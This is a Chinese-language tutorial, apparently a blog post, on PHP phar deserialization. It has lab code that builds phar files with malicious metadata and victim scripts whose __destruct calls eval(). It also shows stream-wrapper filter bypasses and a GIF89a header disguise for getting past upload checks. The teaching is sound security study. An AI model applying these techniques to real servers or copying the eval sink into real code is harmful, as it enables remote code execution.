目录
基础知识
前言
Phar基础
Phar文件结构
受影响的函数
漏洞实验
实验一
实验二
过滤绕过
补充
基础知识
前言
PHP反序列化常见的是使用unserilize()进行反序列化,除此之外还有其它的反序列化方法,不需要用到unserilize()。就是用到了本文的主要内容——phar反序列化
Phar基础
Phar是将php文件打包而成的一种压缩文档,类似于Java中的jar包。它有一个特性就是phar文件会以序列化的形式储存用户自定义的meta-data。以扩展反序列化漏洞的攻击面,配合phar://协议使用。
Phar文件结构
a stub是一个文件标志,格式为 :xxx<?php xxx;__HALT_COMPILER();?>。
manifest是被压缩的文件的属性等放在这里,是主要的攻击点,因为这里以序列化的形式存储了用户自定义的Meta-data。
contents是被压缩的内容。
signature签名,放在文件末尾。签证尾部的01代表md5加密,02代表sha1加密,04代表sha256加密,08代表sha512加密
受影响的函数
所有文件函数均可使用
但实际上只要调用了php_stream_open_wrapper的函数,都存在这样的问题。
漏洞实验
-
实验一
生成phar文件
注意:如果想要生成Phar文件,要将
php.ini中的phar.readonly选项设置为Off,否则无法生成phar文件。
<?php
class test{
public $name='phpinfo();';
}
$phar=new phar('test.phar');//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
$obj=new test();
$phar->setMetadata($obj);//自定义的meta-data存入manifest
$phar->addFromString("flag.txt","flag");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?><?php
class test{
public $name='';
public function __destruct()
{
eval($this->name);
}
}
echo file_get_contents('phar://test.phar/flag.txt');
?>
-
实验二
生成phar文件
<?php
class test{
public $name="qwq";
function __destruct()
{
echo $this->name;
}
}
$a = new test();
$a->name="phpinfo();";
$phartest=new phar('phartest.phar',0);//后缀名必须为phar
$phartest->startBuffering();//开始缓冲 Phar 写操作
$phartest->setMetadata($a);//自定义的meta-data存入manifest
$phartest->setStub("<?php __HALT_COMPILER();?>");//设置stub,stub是一个简单的php文件。PHP通过stub识别一个文件为PHAR文件,可以利用这点绕过文件上传检测
$phartest->addFromString("test.txt","test");//添加要压缩的文件
$phartest->stopBuffering();//停止缓冲对 Phar 归档的写入请求,并将更改保存到磁盘
?>
<?php
class test{
public $name="";
public function __destruct()
{
eval($this->name);
}
}
$phardemo = file_get_contents('phar://phartest.phar/test.txt');
echo $phardemo;
过滤绕过
有以下几种方法可以绕过:
compress.bzip2://phar://
compress.zlib://phar:///
php://filter/resource=phar://
除此之外,我们还可以将phar伪造成其他格式的文件。php识别phar文件是通过其文件头的stub,更确切一点来说是__HALT_COMPILER();?>这段代码,对前面的内容或者后缀名是没有要求的。那么我们就可以通过添加任意的文件头+修改后缀名的方式将phar文件伪装成其他格式的文件。
<?php
class TestObject {
}
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub,增加gif文件头
$o = new TestObject();
$phar->setMetadata($o); //将自定义meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
补充
windows端口被占用的问题
netstat -aon|findstr "8099"
tasklist|findstr "8972"
taskkill /f /t /im node.exe
![C#中[]的几种用法](https://img-blog.csdnimg.cn/c9f6bb41a0f24f06b985b645b89348c6.png)
